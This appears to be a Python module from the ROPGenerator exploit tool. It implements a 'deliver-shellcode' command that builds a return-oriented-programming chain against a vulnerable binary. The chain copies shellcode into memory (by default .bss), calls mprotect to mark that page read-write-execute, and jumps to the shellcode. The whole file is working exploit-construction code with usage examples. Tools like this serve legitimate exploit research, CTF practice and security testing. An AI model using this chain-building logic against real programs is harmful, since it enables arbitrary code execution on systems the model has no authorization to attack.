# -*- coding:utf-8 -*-  
# DeliverShellcode module: exploit type: copy shellcode into memory then execute it

from ropgenerator.IO import string_bold, string_special, banner, error, notify, info, verbose
from ropgenerator.Constraints import Constraint, Assertion, BadBytes, Chainable
from ropgenerator.exploit.HighLevelUtils import STRtoMEM
from ropgenerator.exploit.syscalls.SyscallDef import build_syscall_Linux
from ropgenerator.exploit.Scanner import getSectionAddress
from ropgenerator.exploit.Shellcode import select_shellcode
from ropgenerator.semantic.Engine import search
from ropgenerator.Database import QueryType
from ropgenerator.semantic.ROPChains import PwnChain
import ropgenerator.Architecture as Arch 
import ropgenerator.exploit.syscalls.Linux32 as Linux32
import ropgenerator.exploit.syscalls.Linux64 as Linux64

################################
#  DELIVER-SHELLCODE COMMAND   # 
################################

# Options 
OPTION_ADDRESS = '--address'
OPTION_ADDRESS_SHORT = "-a"

OPTION_RANGE = "--address-range" 
OPTION_RANGE_SHORT = "-r" 

OPTION_HELP = '--help'
OPTION_HELP_SHORT = '-h'


CMD_DSHELL_HELP =  banner([string_bold("'deliver-shellcode' command"),\
                    string_special("(Deliver a shellcode & Execute it)")])
CMD_DSHELL_HELP += "\n\n\t"+string_bold("Description:")+\
"\n\t\tThis method tries to create an executable memory area"+\
"\n\t\t, then copy a given shellcode into this area, and then"+\
"\n\t\t jump to execute this shellcode"

CMD_DSHELL_HELP += "\n\n\t"+string_bold("Options")+":"
CMD_DSHELL_HELP += "\n\n\t\t"+string_special(OPTION_ADDRESS_SHORT)+","+string_special(OPTION_ADDRESS)+" <int>\t Address where to deliver shellcode"
CMD_DSHELL_HELP += "\n\n\t\t"+string_special(OPTION_RANGE_SHORT)+","+string_special(OPTION_RANGE)+" \t Memory space that can be used to\n\t\t\t<addr>,<addr>\t deliver the shellcode"

CMD_DSHELL_HELP += "\n\n\t"+string_bold("Examples")+": "+\
    "\n\t\tpwn deliver-shellcode --address 0x084cd560"+\
    "\n\t\tpwn deliver-shellcode --address-range 0x6c4000,0x6c6000"
    
def print_help():
    print(CMD_DSHELL_HELP)
    


def dshell(args, constraint, assertion, lmax):
            
    address = None
    limit = None
    seenAddress = False
    seenRange = False
    
    # Parse options    
    i = 0 
    while i < len(args):
        if( args[i][0] == '-' ):
            if( args[i] in [OPTION_ADDRESS_SHORT, OPTION_ADDRESS]):
                if( seenAddress ):
                    error("Error. '" + args[i] + "' option should be used only once")
                    return None 
                elif( seenRange ):
                    error("Error. You can't specify a delivery address and range at the same time")
                    return None
                
                if( i+1 >= len(args)):
                    error("Error. Missing address after option '"+args[i]+"'")
                    return 
                seenAddress = True
                try:
                    address = int(args[i+1])
                except:
                    try:
                        address = int(args[i+1], 16)
                    except:
                        error("Error. '" + args[i+1] +"' bytes is not valid")
                        return None 
                i = i +2
                seenAddress = True
            elif( args[i] in [OPTION_HELP, OPTION_HELP_SHORT]):
                print_help()
                return "help" 
            elif( args[i] in [OPTION_RANGE, OPTION_RANGE_SHORT]):
                if( seenRange ):
                    error("Error. '" + args[i] + "' option should be used only once")
                    return None 
                elif( seenAddress ):
                    error("Error. You can't specify a delivery address and range at the same time")
                    return None
                
                if( i+1 >= len(args)):
                    error("Error. Missing address range after option '"+args[i]+"'")
                    return 
                seenRange = True
                values = args[i+1].split(',')
                if( len(values) < 2 ):
                    error("Error. Invalid address range")
                    return 
                elif( len(values) > 2):
                    error("Error. Too many values after '{}' option".format(args[i]))
                    return 
                int_values = []
                # Convert addresses into int 
                for value in values: 
                    try:
                        address = int(value)
                    except:
                        try:
                            address = int(value, 16)
                        except:
                            error("Error. '" + value +"' isn't a valid address")
                            return None 
                    if( address < 0 ):
                        error("Error. Addresses can't be negative")
                        return None 
                    int_values.append(address)
                # Check consistency 
                if( int_values[0] > int_values[1] ):
                    error("Error. Invalid address range: lower address should be inferior to upper address")
                    return None
                # Ok 
                (address,limit) = int_values
                i += 2
            else:
                error("Error. Unknown option '{}'".format(args[i]))
                return None 
        else:
            error("Error. Invalid option '{}'".format(args[i]))
            return None 
    
    # Select shellcode to deliver 
    (shellcode,shellcode_info) = select_shellcode(Arch.currentArch.name)
    if( not shellcode ):
        return None
    else:
        shellcode = str(shellcode)        
    
    # Build the exploit 
    print("")
    info("Building exploit: deliver-shellcode strategy\n\n")
    res = build_dshell(shellcode, constraint, assertion, address, limit, lmax)
    return res
    

def build_dshell(shellcode, constraint, assertion, address, limit, lmax, optimizeLen=False ):
    """
    Returns a PwnChain() instance or None
    """
    # Build exploit
    #################
    
    res = PwnChain()
    
    #Find address for the payload 
    if( not address ):
        # Get the .bss address 
        # TODO 
        notify("Getting delivery address for shellcode")
        address = getSectionAddress('.bss')
        addr_str = ".bss" 
        if( not address ):
            verbose("Couldn't find .bss address")
            return []
    else:
        addr_str = hex(address)
    
    if( not limit ):
        limit = address + Arch.minPageSize()
      
    # Deliver shellcode 
    notify("Building chain to copy shellcode in memory")
    verbose("{}/{} bytes available".format(lmax*Arch.octets(),lmax*Arch.octets()))
    (shellcode_address, STRtoMEM_chain) = STRtoMEM(shellcode, address, constraint, assertion, limit=limit, lmax=lmax, addr_str=addr_str, hex_info=True, optimizeLen=optimizeLen)
    address = shellcode_address
    addr_str = hex(address)
    if( not STRtoMEM_chain ):
        verbose("Could not copy shellcode into memory")
        return None
    
    # Building mprotect 
    notify("Building mprotect() chain")
    # Getting page to make executable
    # Arg of mprotect MUST be a valid multiple of page size 
    over_page_size = address % Arch.minPageSize()
    page_address = address - over_page_size
    length = len(shellcode)+1+over_page_size
    flag = 7 
    lmax2 = lmax-len(STRtoMEM_chain)
    verbose("{}/{} bytes available".format(lmax2*Arch.octets(),lmax*Arch.octets()))
    if( lmax2 <= 0 ):
        return None
    if( Arch.currentArch == Arch.ArchX86 ):
        if( Linux32.supported('mprotect')):
            mprotect_chain = build_syscall_Linux(Linux32.getSyscall("mprotect"), [page_address, length, flag], 32,\
            constraint.add(Chainable(ret=True)), assertion, clmax=lmax2-2, optimizeLen=optimizeLen)
        else:
            verbose("mprotect syscall not supported for architecture {}".format(Arch.currentArch.name))
            return None
    elif( Arch.currentArch == Arch.ArchX64 ):
        if( Linux64.supported('mprotect')):
            mprotect_chain = build_syscall_Linux(Linux64.getSyscall("mprotect"), [page_address, length, flag], 64,\
            constraint.add(Chainable(ret=True)), assertion, clmax=lmax2-2, optimizeLen=optimizeLen)
        else:
            verbose("mprotect syscall not supported for architecture {}".format(Arch.currentArch.name))
            return None
    else:
        mprotect_chain = None 
        verbose("mprotect call not supported for architecture {}".format(Arch.currentArch.name))
        return None
    if(not mprotect_chain):
        return None
    verbose("Done")
    
    # Jump to shellcode 
    notify("Searching chain to jump to shellcode") 
    verbose("{}/{} bytes available".format((lmax2-len(mprotect_chain))*Arch.octets(),lmax*Arch.octets())) 
    jmp_shellcode_chains = search(QueryType.CSTtoREG, Arch.ipNum(), address, constraint, assertion, clmax=lmax-len(STRtoMEM_chain)-len(mprotect_chain), optimizeLen=optimizeLen)
    if( not jmp_shellcode_chains ):
        verbose("Couldn't find a jump to the shellcode")
        return None
    verbose("Done")
    notify("Done")
    
    # Build PwnChain res and return 
    res.add(mprotect_chain, "Call mprotect({},{},{})".format(hex(page_address), length, flag))
    res.add(STRtoMEM_chain, "Copy shellcode to {}".format(addr_str)) 
    res.add(jmp_shellcode_chains[0], "Jump to shellcode (address {})".format(addr_str))
    return res 
